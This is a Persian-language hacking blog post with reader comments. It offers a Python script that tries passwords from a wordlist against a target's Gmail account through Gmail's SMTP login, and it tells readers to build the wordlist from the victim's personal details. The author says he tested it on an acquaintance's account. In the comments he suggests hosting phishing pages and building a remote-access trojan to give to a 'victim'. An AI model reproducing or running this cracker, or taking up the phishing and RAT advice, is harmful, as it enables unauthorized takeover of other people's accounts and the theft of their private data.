کرکر جیمیل :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

کرکر جیمیل

از اونجایی که بیشتر کرکرهای جیمیل از کار افتادن بالاخره به درخواست یکی از دوستان گفتم کرکر جیمیل رو بنویسم و براتون قرار بدم که استفاده کنین چون خودمم بار ها نیازم شده اما حسش نبوده درست کنم اما الان حس مس رو گذاشتم کنار چون بعضی مواقع بدرد میخوره :)

راستی توی این برنامه از طریق حملات دیکشنری ، ایمیل رو مورد عنایت قرار میدیم

نحوه ی کار کرد کرکرمون به این شکله که اول از همه یه آدرس ایمیل میگیریم ، بعدا هم مسیر یه فایل پسوورد رو میگیریم و در آخر هم با استفاده از اون پسوورد لیست سمت smtp.gmail.com از طریق پورت 587 درخواست میفرستیم و ایمیل و پسوورد رو روی اون تست میکنیم تا زمانی که جواب مثبت بگیریم

فقط یه نکته بگم اینکه اگه اطلاعات خاصی در مورد صاحب ایمیل دارین بهتره یه خرده از اونا در جهت نوشتن پسوورد استفاده کنین ، مثلا اگه اسم طرفی که ایمیل داره shadi باشه ، میتونیم پسوورد رو به این شکل بنویسیم Shadi12345 و ... که اینجور چیزارو میسپارم به خودتون تا در موردش تحقیق کنین چون قبلا تو یکی از پست های بخش کراک گفته بودم

در کل یه لیست پسوورد درست کنین و بعدش کدهای پایین رو کپی کنین داخل اسکریپت پایتونیتون

import smtplib

email = raw_input("Enter your target email address => ")
passwfile = raw_input("\nEnter your target password address => ")
passwfile = open(passwfile, "r")

def crack():
    smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
    smtpserver.ehlo()
    smtpserver.starttls()

    for password in passwfile:
        try:
            smtpserver.login(email, password)
            print("\nYour email password was successfully found , password => %s" % password)
            break
        except smtplib.SMTPAuthenticationError:
            print("\nThe password does not match the email you want , password => %s" % password)

crack()

حالا اسکریپت رو ذخیره و اجرا کنین که برای اینکار میتونین کلید F5 رو از روی کیبوردتون بزنین

وقتی که اسکریپت رو اجرا کردین ، آدرس یه ایمیلی رو بدین که برای خودتون باشه تا تست کنیم ببینیم برنامه درسته یا نه  مثلا من آدرس ایمیل یکی از آشناهامو میدم که پسووردشم خوشبختانه مربوط به همون اطلاعات شخصی خودش میشد که فقط تاریخ تولدشو به آخر اسمش اضافه کرده بود

بعدا مسیر یه لیست پسوورد رو بدین که اگه فایل پسووردتون کنار اسکریپتتون بود نیازی نیست که مسیر بدین و فقط اسمشو با پسوندش بزنین کافیه

در آخر هم منتظر بمونین تا پسووردش پیدا شه که اگه پسووردش توی فایل پسوورد نباشه فایده ای نداره و برای همه ی تست های خودش مینویسه که رمز عبور با ایمیل مطابقت نداره

اینم تصویری از تست من

برای واضح تر شدن روی اون کلیک کنید

ضمنا این اسکریپت رو همینجوری هوایی نوشتم که هیچ قابلیتی نداره مثلا نه میتونیم Thread بدیم ، نه میتونیم لیستی از ایمیل هارو بدیم ،نه میتونیم تشخیص بدیم که ایمیل مورد نظرمون دو مرحله ای داره یا نداره و اگه داشته باشه برنامه تشخیص نمیده ، نه میتونیم کمبو بدیم که ببینیم کدومشون روی سایت جیمیل لاگین میده و خیلی چیزای دیگه که اونارو توی اسکریپت بعدی حتما قرار میدم چون اینو درخواست کرده بودن بخاطر همین عجله ای شد و نتونستم قابلیت های خاصی رو بهش بدم

در آخر اینکه جیمیل یا ... که از گوگل سرویس میگیرن به این راحتیا هک نمیشن و اگه هم هک بشن ، یه هکر اونقدر خنگ نیست که بخواد نحوه ی هک اونو به اشتراک بزاره چون دو روزه اون حفره بسته میشه و اون هکر کلی ضرر میکنه در حالی که میتونه از طریق اون حفره ی امنیتی کلی پول به جیب بزنه

اما بنظرم بهترین روش بعد از هک ، همین کرک کردن هستش که صد البته اینجوری فایده نداره و از 50 درصد شاید بتونیم 5 درصد ایمیل بزنیم ولی اگه به مباحث کرک آشنا باشیم میتونیم حرکتای بهتری بزنیم که بعدها هم قراره در مورد کرک کردن اکانت و اینجور مزخرفات پست بنویسم :)

موفق باشید

نظر (۳۷)

اگر میشه این اسکریپت رو هم عوض کردن پروکسی و ست کردن هم بهش تضتفه کنید
Virus32 MR_C0D3R ‌ :
اوکی
تو پست هم گفتم
اینو همینجوری سر سرکی نوشتم
وقت کنم یدونه بهترشو مینویسم
Like ♥
  • Virus32
  • علیرضا آهنی
  • میگم می‌تونستی کاری‌کنی تمام حرف فینگلیش و عداد رو امتحان میکرد دیگه نیازی به پسورد لیست نبود
    Virus32 MR_C0D3R ‌ :
    اصلا میونستم کاری کنم توی یه رنج عددی مثلا رمز های هشت رقمی
    پسوورد تولید کنه و کارشو بکنه اما پسوورد تصادفی و چرت و پرت بدرد نمیخوره و اینجوری حداقلش میدونیم یه لیست داریم
    سلام
    .elho
    چکار میکنه؟
    Virus32 MR_C0D3R ‌ :
    سلام
    دقیقا نمیدونم چیه
    اما برای فرستادن ایمیل باید ازش استفاده کنیم
    که اگه اشتباه نکنم یه چیز تو مایه های همون سلام خودمون باشه :)
    قبلا برای خودمم سوال شده بود اما وقتی از تابعش استفاده کردم
    دیدم آدرس آی پی رو برمیگردونه و ... که نمیدونم چی به چیه
    سلام
    .ehlo
    چکار میکنه؟
    میشه لینک دانلودش رو بزاری؟خیلی لازم دارم
    Virus32 MR_C0D3R ‌ :
    پایتون ؟
    سلام داش کدر عزیز، اینو واسه پایتون 3 تغییر دادم، فقط اینکه عزیز واسه خط دوم target email چیو باید وارد کنیم، اگه زحمت نیست ی توضیح کوچولو بده چون از اون خط ب بعد نمیدونم چی ب چیه ی توضیح بدی دیگه حله تا اخرش میرم
    Virus32 MR_C0D3R ‌ :
    سلام
    کدومارو میگی ؟
    اون raw_input ها ؟
    خب اونارو تغییر بده به input دیگه :(
    ن فدات، اونارو تغییر دادم، منظورم وقتی برنامه رو اجرا میکنیم بود، اولش اینکه ایمیل رو وارد میکنیم، بعد از ایمیل باید چیو وارد کنیم عزیز
    Enter your target password adres از این خط ب بعد منظورم بود
    Virus32 MR_C0D3R ‌ :
    پس اونموقع فکر کنم حلقه ی For رو یه کوچولو باید تغییر بدی و ...
    چون چند روز پیش که پایتون سه نصب کردم دیدم حلقه ی for تو پایتون 3 فرق داره
    چرا خودت امتحان نمیکنی ؟ بشین تست کن دیگه 
    استاد عزیزم اصلا مشکلی با کدهاش ندارم اونارو درست کردم، منظورم اینه ک وقتی برنامه رو اجرا میکنم با F5 خط اول ک ایمیل طرفو باید وارد کنم، خط دوم باید چیو وارد کنم، چون هرچی میزنم ارور میده، گفتم از استاد بپرسم، ک باید محل تکست پسوردهارو بهش بدم یا باید خودم پسورد بهش بدم دستی، بعدش خط بعدی باید چیو وارد کنم ک ارور نزنه؛ درباره اینا میخوام بدونم عزیز
    Virus32 MR_C0D3R ‌ :
    آهان
    باید مسیر یه فایل txt رو بهش بدی که شامل پسوورد هستش
    پست رو میخوندی دیگه :(
    داش کدر عزیز بازم شرمنده، خودت دستورشو مینویسی چون من ادرس میدم ارور میزنه، باید با دابل کوتیشن باشه یا پرانتز، بعد قسمت بعدیش اسم پسورد تکستو بدم؟ واقعا معذرت استاد ک اذیتت میکنم
    Virus32 MR_C0D3R ‌ :
    اگه فایل کنار اسکریپت باشه فقط اسم و پسوند بدی کافیه
    منم مسیرو به این شکل میدم ولی ویندوز من هشته ( مسیر دسکتاپ تو ویندوزهای دیگه شاید یه خرده فرق کنه )
    C:\Users\Username\Desktop\PassList.txt
    جان منی استاد، فقط اینکه این ادرس واسه بعد از نوشتن ایمیل تارگته دیگه، و اونجایی ک نوشته open passwfile جلوی این باید اسم تکست پسوردمونو بدیم، شرمنده عزیز
    Virus32 MR_C0D3R ‌ :
    اون Open pass file رو دستکاری نکن
    اون کارش اینه ، لیست پسووردی که کاربر آدرسشو نوشته رو
    بفرسته توی متغیری که اول از همه آدرس ورودی پسوورد کاربر بوده
    و بعدش جلوی ایمیل و داخل حلقه قرار میگیره و ...
    سلام داش گلم ردیفش کردم، دیگه استاد ببخشید اذیتت میکنم تا یکم راه بیفتیمو با سوالا اذیتت میکنم،

    مرســـــــــــــــی ک هستی داش کدر عزیز و داش ویروس عزیز
    سلام داش روشت قدیمی شده متاسفانه 😥😥😥😥😥😭😭



    جمیل ظاهرا بلاک میکنه ارتباط بین server gmail با کرکر مارو
    من امتحانی پسورد جمیلمو تو passlist گذاشتم و با اون کرکر خواستم جمیلمو هک کنم کرکر گفتش password مچ نیستش در حالی که مچ بود .

    بعد رفتم جمیلم زده بود که دیدم زده یک نفر رمز شماا رو داره


    و جمیلو اونو بلاک کرده
    اگه روش هک جمیل با phishing رو بلدید بگید .

    Virus32 MR_C0D3R ‌ :
    فیک پیج جدید جیمیل رو گیر بیار
    آپلود کن توی یه هاستی چیزی و ...
    خودت میدونی دیگه چرا میپرسی :(
    Like داری
    کار نکرد پسوردم تو پسوردا بود ولی زد نیس اگه میبشه یع چندتا دروه جهت اموزش کتابخونه های پایتون در زمینه فیشینگ یا هک و کرکر سازی بزار مرسی. هزینشم میدیم

    سلام شما راهی بلد نیست که یه پسورد لیست مانندی باشه که همه عداو وحروف رو خودش به صورت اتومات بزن تا پیدا کنه

    سلام شما راهی بلد نیست که یه پسورد لیست مانندی باشه که همه عداو وحروف رو خودش به صورت اتومات بزن تا پیدا کنه

    Virus32 MR_C0D3R ‌ :
    سلام
    میتونم کدی رو بهت بگم که پسوورد تصادفی ایجاد کنه و روی اون ایمیلی که وارد میشه تستش رو انجام بده
    اما اینکار رو پیشنهاد نمیکنم
    چون اینجوری اعداد و حروف تصادفی ایجاد میشن و احتمال کرک کمتر میشه
    اما اگه خودمون بخوایم یه پسوورد لیست بدیم
    حداقلش میتونیم آمار طرف رو در بیاریم و یه پسوورد لیست بهتر از آب در بیاریم

    یعنی اینکه اونطوری نمی تونه جیمیل رو رمزش رو پیدا کنه

    Virus32 MR_C0D3R ‌ :
    اگه عددها و حروف چرت و پرتی که از خودش در میاره درست باشه چرا که نه...

    پس میشه بگید 

     

    پیدا نکردم میشه توضیح کامل بدید وچجوری پیدا کنم

     

    Virus32 MR_C0D3R ‌ :
    من برای کسی کاری انجام نمیدم
    یا اینکه ناقص میگم تا خودش پی اون چیز رو بگیره
    مگر اینکه چیز کاربردی باشه...
    با پستی که بهت معرفی کردم میتونیم پسوورد های تصادفی بسازیم و داخل یه متغیر بریزیم و از طریق یه حلقه تکرار روی آدرس ایمیل تست کنیم

    کدوم پست 

    Virus32 MR_C0D3R ‌ :
    همون پستی که برات لینکش کردم ( قسمتی که رنگ متن سفیده )

    جرا نوشته بودی پسورد تصادفی بدرد نمیخوره تو جواب یه نفر

    Virus32 MR_C0D3R ‌ :
    همونجا هم علتشو گفتم

    میشه درمورد متغیر هم یه چیزی بگی 

    Virus32 MR_C0D3R ‌ :
    متغیر حافظه ای هستش که یه مقداری رو داخل خودش قرار میده و میتونیم تو هر قسمت از برنامه که خواستیم ازش استفاده کنیم

    سلام باز هم من میشه رمز ها رو برام بفرستید ممنون

    Virus32 MR_C0D3R ‌ :
    سلام
    کامنتتو اونور دیدم که درخواست رمز داده بودی
    رمز عبور توسط Attacker ارسال میشه و باید صبور باشی تا اون کامنتتو ببینه و رمز رو برات ایمیل کنه
    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است

    سلام کدر جان
    سال نوت مبارک
    درباره کرک جیمیل داشتم تو نت میگشتم که یه جایی رو دیدم از پستت کپی کرده البته اگه خودت نویسندش نباشی
    میدونم که الان گوگل سخت گیری کرده و فک کنم اسکریپت کار نمیکنه ولی گفتم بازم بهت بگم 
    ******************************************************************************************************************************************
    راستی این پست کرکر جیمیلو دیگه اپدیت نمیکنی؟

    Virus32 MR_C0D3R ‌ :
    سلام
    اگه تاریخ تولید شدنشو توی آدرس سایت نگاه کنی
    تقریبا یک سال با زمانی که من این پست رو نوشتم متفاوته
    بزار کپی کنن فدا سرت
    ما هدفمون پیشرفته تا اینکه به فکر این باشیم که کی کپی میکنه و کپی نمیکنه

    ----

    نمیدونم
    اینروزا حال و حوصله ی خودمم ندارم

    سلام دوباره من بعد تقریبا ۵ ماه میدونم ربطی نداره ولی چرا sqli dumper بهم url نمیده بهترین سایتی که تا حالا دیدم

    Virus32 Virus 32 :
    سلام
    نمیدونم والا از خودشون باید پرسید! :)

    جیمیل و رمز خودمم زدم میگه درست نیست انگار کار نمیکنه !!!

    Virus32 MR_C0D3R ‌ :
    چون جیمیل جلوی ورود برنامه رو میگیره
    برای اینکه درست کار کنه بایستی توی حساب گوگل اجازه به برنامه ها داده بشه

    یک چیزی که ادم بتونه این کار رو بکنه نداریم ؟ خب اینطوری که نمیشه کسی رو کرک کرد کسی میاد اجازه میده به همچین برنامه هایی :|

    Virus32 MR_C0D3R ‌ :
    نوچ
    بهترین روش ساختن کرکری مشابه سنتری و غیره... هستش
    که بیایم یکسری چیزارو مثل لاگین موفق و غیر موفق و غیره... رو براش تعریف کنیم و کمبو بدیم و استارت کنیم

    سلام خسته نباشین این پورت ک گذاشتین رو میتونیم تغییر بدیم این با ایمیل درس بر نمیاد

     

    Virus32 Virus 32 :
    سلام
    25 یا 465 هم میتونید قرار بدین

    چرا برا پایتون2 من پایتون3 دارم

    باید چیکار کنم که رو پایتون3 کار بکنه؟

    Virus32 MicRoB 32 :
    قبلا در موردش یه پست گذاشتن بچه ها --> کلیک

    نمیشه کاری کنی با پروکسی لیست اینکارو بکنه چون ممکنه ای می بلاک شه

    Virus32 Ax0o 32 :
    اممم خیر نمیشه مگر اینکه با requests کار کنید

    لطفا هک اکانت کلش اف کلنز رو بزارید.
    ممنون میشم.

    سلام 

    تو تست کد زدم  eror داد نمی گه مشکلش چیا 

    بعد اگه تو تگ فرم آیدی سایت هدف رو بدیم می شه یه کرکر با جاوا اشکریپت ساخت 

    راهنماییی می کنین

    Virus32 Virus 32 :
    سلام
    برای کرک جیمیل خیلی تلاش کردم
    این پست رو که کدر نوشته من کاری ندارم
    ولی من به هیچ نتیجه ی مطلوبی نرسیدم
    هر متدی هر کدی نوشتم فوقش یه مدت کوتاهی کار کرد
    این متد smtp که خیلی خیلی وقت ها پیش غیرفعال شده
    ساخت کرکر یه مقوله طولانی هست
    الان تو ایران قسمت عظیم هک رو کرکرها دست گرفتن و به نظرم بحث کردن درباره اش خالی از لطف نیست
    بهت قول میدم نزدیکی ها یه پست درباره اش بنویسم و یه کرکر باهم بسازیم
    علبته عگه دوستان بالا باز گیر ندن
  • Virus32
  • حجت اسلام فاکر
  • سلام اره یه سوال چرا از بایتون ۳ استفاده نمی کنی الان نمی توانم ایده های تو رو استفاده کنم راستی ایدی تل داری کار دارم باهات 

    سلام چرا برام ارور میده

    Virus32 Virus 32 :
    سلام
    برا همه ارور میده

    سلام استاد امیدوارم خوب باشید من اجرا میکنم ارور میده email = raw_input("Enter your target email address => ")
    NameError: name 'raw_input' is not defined

    لطفا کمک کنید 

    Virus32 Virus 32 :
    سلام عزیز
    شما هنوز به این پست امیدوارین؟
    کرک جیمیل؟
    بهتره رات بسازین بدین به قربانی تون

    سلام برای من ارور raw_input میده

    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی